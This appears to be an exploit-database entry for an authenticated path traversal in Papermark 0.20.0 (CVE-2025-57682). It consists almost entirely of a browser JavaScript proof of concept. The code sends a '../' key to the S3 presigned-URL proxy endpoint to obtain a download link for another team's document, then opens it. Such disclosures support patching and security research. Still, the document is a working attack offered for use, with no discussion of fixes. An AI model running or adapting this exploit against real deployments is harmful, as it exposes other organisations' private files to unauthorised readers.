// Exploit Title: Papermark 0.20.0 - Path Traversal (Authenticated)
// Date: 2026-01-28
// Exploit Author: Eui Chul Chung
// Vendor Homepage: https://www.papermark.com/
// Software Link: https://github.com/mfts/papermark
// Version: 0.20.0
// CVE Identifier: CVE-2025-57682

(async () => {
  const teamId = prompt("Enter team ID");
  const docId = prompt("Enter document ID");
  const fileName = prompt("Enter file name");

  const { id } = await fetch("/api/teams", { method: "GET" })
    .then((res) => res.json())
    .then((res) => res[0]);

  const { url } = await fetch(`/api/file/s3/get-presigned-get-url-proxy`, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ key: `${id}/../${teamId}/${docId}/${fileName}` }),
  }).then((res) => res.json());

  window.location.assign(url);
})();